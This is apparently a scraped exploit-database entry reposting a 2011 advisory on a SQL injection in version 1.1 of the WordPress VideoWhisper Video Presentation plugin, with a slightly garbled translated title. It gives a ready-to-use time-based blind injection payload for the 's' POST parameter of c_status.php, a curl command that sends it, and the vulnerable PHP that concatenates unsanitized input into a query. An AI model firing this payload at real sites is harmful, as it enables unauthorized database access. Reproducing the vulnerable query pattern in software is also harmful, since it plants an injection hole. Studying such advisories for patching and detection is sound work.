WP VideoWhisper plugin 1. Version 1 0DAY-vulnerability warning-the black bar safety net

2011-09-08T00:00:00
ID MYHACK58:62201131803
Type myhack58
Reporter 佚名
Modified 2011-09-08T00:00:00

Description

EXP: a

Date: 2011-09-02

Author: Miroslav Stampar (miroslav. stampar(at)gmail.com @stamparm)

Software Link: <http://downloads.wordpress.org/plugin/videowhisper-video-presentation.zip>

Version: 1.1 (tested)

Note: magic_quotes has to be turned off

--------------- PoC (POST data) --------------- <http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php> s=-1' AND 1=IF(2>1,BENCHMARK(5 0 0 0 0 0 0,MD5(CHAR(115,113,108,109,97,112))),0)--%2 0 e.g.: curl --data "s=-1' AND 1=IF(2>1,BENCHMARK(5 0 0 0 0 0 0,MD5(CHAR(115,113,108,109,97,112))),0)-- " <http://www.site.com/wp-content/plugins/videowhisper-video-presentation/vp/c_status.php> --------------- Vulnerable code --------------- $s=$_POST['s']; ... $sql = "SELECT * FROM $table_name where session='$s' and status='1'";

$session = $wpdb->get_row($sql);